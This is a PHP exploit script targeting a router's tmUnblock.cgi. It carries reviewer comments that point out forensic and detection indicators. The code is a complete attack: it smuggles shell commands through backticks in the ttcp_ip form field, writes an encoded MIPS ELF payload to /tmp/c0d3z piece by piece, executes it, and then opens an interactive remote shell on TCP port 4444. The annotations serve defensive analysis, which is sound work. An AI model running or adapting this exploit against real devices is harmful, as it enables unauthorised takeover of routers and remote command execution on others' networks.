#!/usr/bin/php
<?php
// Silence every PHP warning/notice (e.g. from a failed fsockopen()); the only
// failure reporting left is the script's own "fail" messages via die().
error_reporting (0);
// Target address and HTTP port are hard-coded; nothing is read from argv.
$host = "192.168.1.1" ;
$port = "8080" ;
// CGI path that build_packet() POSTs to.
$vuln = "tmUnblock.cgi" ;
// Opaque binary blob that build_payload() writes to /tmp/c0d3z on the target.
// Forensic note: the first decoded bytes are an ELF header -- \x7fELF, class 1
// (32-bit), data 1 (little-endian), e_type 2 (executable), e_machine 8 (MIPS),
// e_entry 0x00400054. /tmp/c0d3z is the on-host indicator to look for.
// NOTE(review): what the binary does once run is not visible on this page; the
// later connect to TCP 4444 suggests it starts a listener, but that is inferred.
$shellcode = base64_decode (
"f0VMRgEBAQAAAAAAAAAAAAIACAABAAAAVABAADQAAAAAAAAAAA" .
"AAADQAIAABAAAAAAAAAAEAAAAAAAAAAABAAAAAQAB7AQAAogIA" .
"AAcAAAAAEAAA4P+9J/3/DiQnIMABJyjAAf//BihXEAIkDAEBAV" .
"BzDyT//1Aw7/8OJCdwwAERXA0kBGjNAf/9DiQncMABJWiuAeD/" .
"ra/k/6Cv6P+gr+z/oK8lIBAC7/8OJCcwwAHg/6UjSRACJAwBAQ" .
"FQcw8kJSAQAgEBBSROEAIkDAEBAVBzDyQlIBAC//8FKP//BihI" .
"EAIkDAEBAVBzDyT//1AwJSAQAv3/DyQnKOAB3w8CJAwBAQFQcw" .
"8kJSAQAgEBBSjfDwIkDAEBAVBzDyQlIBAC//8FKN8PAiQMAQEB" .
"UHMPJFBzBiT//9AEUHMPJP//BijH/w8kJ3jgASEg7wPw/6Sv9P" .
"+gr/f/DiQncMABIWDvAyFojgH//6Ct8P+lI6sPAiQMAQEBL2Jp" .
"bi9zaA=="
);
/**
 * Percent-encode every byte of $string except '&', which is passed through so
 * the form-field separators assembled in build_packet() survive.
 *
 * Unlike urlencode()/rawurlencode() this also encodes unreserved characters
 * (letters, digits, '='), and dechex() is not zero-padded, so bytes below 0x10
 * come out as a single hex digit (0x09 -> "%9"), which is not standard
 * percent-encoding. A request body that is almost entirely "%xx" sequences
 * joined by bare '&' is therefore a recognisable artifact of this tool in a
 * captured request.
 *
 * @param string $string raw form body
 * @return string encoded body
 */
function full_urlencode( $string ) {
$ret = "" ;
for ( $c =0; $c < strlen ( $string ); $c ++) {
if ( $string [ $c ] != '&' )
$ret .= "%" . dechex (ord( $string [ $c ]));
else
$ret .= "&" ;
}
return $ret ;
}
/**
 * Transfer $shellcode to the target as a series of shell commands, 20 bytes
 * per request.
 *
 * Sequence: (1) "rm /tmp/c0d3z"; (2) for each 20-byte slice, an
 * `echo -en '\0NNN...' >> /tmp/c0d3z` command whose octal escapes are built
 * with decoct(), sent with a 100 ms pause (usleep) between requests;
 * (3) "chmod a+rwx /tmp/c0d3z". Every command goes through build_packet() and
 * send_packet(); the first failed send terminates the whole script via die().
 * Progress is printed to stdout.
 *
 * Detection note: one HTTP POST per 20 payload bytes means a single run
 * produces many near-identical requests to the same CGI within seconds --
 * a clear volume/shape signature for the web-server log. No response is
 * ever read, so "sent!" only means the bytes left the local socket.
 *
 * @param string $host
 * @param string $port
 * @param string $vuln      CGI path passed to build_packet()
 * @param string $shellcode raw bytes to write to /tmp/c0d3z
 * @return void
 */
function build_payload( $host , $port , $vuln , $shellcode ) {
echo "\tCleaning up... " ;
$cleanup = build_packet( $host , $port , $vuln , "rm /tmp/c0d3z" );
if (!send_packet( $host , $port , $cleanup )) die ( "fail\n" );
else echo "done!\n" ;
for ( $i =0; $i < strlen ( $shellcode ); $i +=20) {
echo "\tSending " . $i . "/" . strlen ( $shellcode ). " bytes... " ;
$cmd = "echo -en '" ;
// Each byte becomes "\0" + octal digits, which `echo -en` turns back into the raw byte.
for ( $c = $i ; $c < $i +20 && $c < strlen ( $shellcode ); $c ++) {
$cmd .= "\\0" . decoct (ord( $shellcode [ $c ]));
}
$cmd .= "' >> /tmp/c0d3z" ;
$cmd = build_packet( $host , $port , $vuln , $cmd );
if (!send_packet( $host , $port , $cmd )) die ( "fail\n" );
else echo "sent!\n" ;
usleep(100000);
}
echo "\tConfiguring... " ;
$config = build_packet( $host , $port , $vuln , "chmod a+rwx /tmp/c0d3z" );
if (!send_packet( $host , $port , $config )) die ( "fail\n" );
else echo "done!\n" ;
}
/**
 * Build a raw HTTP/1.1 POST to /$vuln whose form body places $payload inside
 * backticks in the ttcp_ip field ("ttcp_ip=-h `<payload>`"); the script relies
 * on the target running that field value through a shell. The remaining fields
 * (submit_button, change_action, submit_type, action, commit=0, ttcp_num=2,
 * ttcp_size=2, StartEPI=1) are fixed. The body is encoded by full_urlencode(),
 * so the backtick appears as "%60" in the wire body.
 *
 * The Authorization header is a fixed Basic credential "admin:ThisCanBeAnything";
 * the literal itself records that the password value is not expected to matter
 * to the target. No Connection, User-Agent or Accept headers are sent.
 *
 * Detection note: a POST to tmUnblock.cgi whose ttcp_ip value contains a
 * backtick (or %60) together with StartEPI=1 is the request shape to alert on;
 * the over-encoded body (see full_urlencode()) and the absent User-Agent are
 * secondary indicators.
 *
 * @param string $host    value for the Host header
 * @param string $port    unused here; accepted for a uniform signature
 * @param string $vuln    CGI path
 * @param string $payload shell command text to embed
 * @return string complete HTTP request (headers + body)
 */
function build_packet( $host , $port , $vuln , $payload ) {
$exploit = full_urlencode(
"submit_button=&" .
"change_action=&" .
"submit_type=&" .
"action=&" .
"commit=0&" .
"ttcp_num=2&" .
"ttcp_size=2&" .
"ttcp_ip=-h `" . $payload . "`&" .
"StartEPI=1"
);
$packet =
"POST /" . $vuln . " HTTP/1.1\r\n" .
"Host: " . $host . "\r\n" .
"Authorization: Basic " . base64_encode ( "admin:ThisCanBeAnything" ). "\r\n" .
"Content-Type: application/x-www-form-urlencoded\r\n" .
"Content-Length: " . strlen ( $exploit ). "\r\n" .
"\r\n" .
$exploit ;
return $packet ;
}
/**
 * Open a TCP connection to $host:$port, write $packet once, and close.
 *
 * Returns false when the connect or the write fails. Caveats visible in the
 * code: on a write failure the socket is not closed (fclose() is only reached
 * on the success path); fwrite() returning 0 for an empty packet also reads as
 * failure; the response is never read, so a true result only means the bytes
 * were accepted by the local socket. Uses fsockopen()'s default timeout (no
 * explicit timeout argument, unlike the 30 s connectivity check in the main
 * flow). $errno/$errstr are populated by fsockopen() but never reported
 * because error_reporting(0) is set at the top of the file.
 *
 * @param string $host
 * @param string $port
 * @param string $packet raw bytes to send
 * @return bool
 */
function send_packet( $host , $port , $packet ) {
$socket = fsockopen ( $host , $port , $errno , $errstr );
if (! $socket ) return false;
if (!fwrite( $socket , $packet )) return false;
fclose( $socket );
return true;
}
// ---- main flow -------------------------------------------------------------
// 1. Connectivity check: a bare TCP connect to $host:$port with a 30 s timeout.
//    No HTTP is exchanged, so "connected!" only means the port accepted the
//    connection.
echo "Testing connection to target... " ;
$socket = fsockopen ( $host , $port , $errno , $errstr , 30);
if (! $socket ) die ( "fail\n" );
else echo "connected!\n" ;
fclose( $socket );
// 2. Write the binary to /tmp/c0d3z (see build_payload()), then wait 3 s.
echo "Sending payload... \n" ;
build_payload( $host , $port , $vuln , $shellcode );
sleep(3);
// 3. Run it through the same injection point: the payload is just the file path.
echo "Executing payload... " ;
if (!send_packet( $host , $port , build_packet( $host , $port , $vuln , "/tmp/c0d3z" ))) die ( "fail\n" );
else echo "done!\n" ;
sleep(3);
// 4. Connect to TCP port 4444 on the target (30 s timeout). The script assumes
//    the binary it just ran is listening there; nothing on this page shows that.
//    Network indicator: an inbound connection to 4444 on the device shortly
//    after the burst of POSTs to tmUnblock.cgi.
echo "Attempting to get a shell... " ;
$socket = fsockopen ( $host , 4444, $errno , $errstr , 30);
if (! $socket ) die ( "fail\n" );
else echo "connected!\n" ;
// 5. Interactive loop until the peer closes: read one line from the operator,
//    append ";echo xxxEOFxxx\n" as an end-of-output sentinel, then read the
//    reply one byte at a time until the sentinel shows up (or EOF) and print
//    it with the sentinel stripped. The literal "xxxEOFxxx" travels in clear on
//    the wire in both directions -- a usable content signature.
// NOTE(review): readline() returns false on local EOF (Ctrl-D); that is
// concatenated as "" and still sent, so the loop ends only on remote close.
echo "Opening shell... \n" ;
while (! feof ( $socket )) {
$cmd = readline( $host . "$ " );
if (! empty ( $cmd )) readline_add_history( $cmd );
fwrite( $socket , $cmd . ";echo xxxEOFxxx\n" );
$data = "" ;
do {
$data .= fread ( $socket , 1);
} while ( strpos ( $data , "xxxEOFxxx" ) === false && ! feof ( $socket ));
echo str_replace ( "xxxEOFxxx" , "" , $data );
}
?>